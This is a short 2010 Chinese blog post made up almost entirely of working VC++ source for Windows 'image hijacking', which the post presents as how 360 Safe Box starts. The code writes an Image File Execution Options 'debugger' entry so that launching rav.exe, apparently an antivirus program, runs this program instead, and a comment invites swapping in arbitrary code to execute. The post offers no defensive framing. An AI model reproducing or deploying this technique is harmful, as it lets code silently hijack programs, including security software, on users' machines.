VC++实现镜像劫持(360保险箱启动原理)

#include "stdafx.h"
#include <stdio.h>
#include <windows.h>

int main(int argc, char* argv[])
{
 char temp[256];
 DWORD ret;
 LPCTSTR szRegKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"; //定义字符串指针,保存映像劫持的键位
 HKEY h_KEY;
 if(argc!=1)   //如果参数不是1个,提取第2个参数,也就是被劫持程序的路径
 {
  memset(temp,0,256);
  strcpy(temp,argv[1]);   
  for(int i=0;i<strlen(temp);i++)    //将路径中的\换为/,也可以换为\\,就是代码长了点
  {
   if(temp[i]=='\\')
    temp[i]='/';
  }         
  ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,szRegKey,0,KEY_ALL_ACCESS,&h_KEY); //打开注册表中需要映像劫持的子键获得句柄
  if(ret==ERROR_SUCCESS)
  {
   printf("open ok!\n");
   if(ERROR_SUCCESS==RegDeleteKey(h_KEY,"rav.exe")) //将上面打开的子键下的rav子键删除
   {
    printf("delete ok!\n");
    RegCloseKey(h_KEY);
    WinExec(temp,SW_SHOW);    //运行被劫持的程序
   }
   else
   {
    printf("delete failed!\n");
    RegCloseKey(h_KEY);
   }   
  }
  else
  printf("open failed!\n");
 }
 memset(temp,0,256);
 GetModuleFileName(NULL,temp,256);   //得到程序自己的路径,为下面写入注册表做准备
 HKEY hResultKey = NULL;
 if (ERROR_SUCCESS == RegOpenKeyEx(HKEY_LOCAL_MACHINE,szRegKey, 0, KEY_ALL_ACCESS,&h_KEY))  //打开注册表中映像劫持的子键,获得句柄
 {
  DWORD dw;
  ret = RegCreateKeyEx(h_KEY,"rav.exe", 0, REG_NONE,REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL,&hResultKey, &dw);  //在上面打开的子键下创建rav子键并打开,获得句柄
  if (ret!=ERROR_SUCCESS)
  {
  RegCloseKey(h_KEY);
  printf("creat failed!\n");
  return 1;
  }
  printf("creat ok!\n");
  ret=RegSetValueEx(hResultKey,"debugger",0,REG_SZ,(const BYTE *)temp,strlen(temp)+1);   //在rav键上创建debugger键并设置值为本程序的路径用于映像劫持
  if(ret!=ERROR_SUCCESS)
  {
  RegCloseKey(h_KEY);
  RegCloseKey(hResultKey);
  return 1;
  }
  RegCloseKey(h_KEY);
  RegCloseKey(hResultKey);
  printf("set ok!\n");
 }
 MessageBox(NULL,"ok!","成功!",MB_OK);    //用于测试程序,可换为其他需要执行代码
 

 return 0;
}
posted on 2010-05-30 22:01  carekee  阅读(423)  评论(0编辑  收藏  举报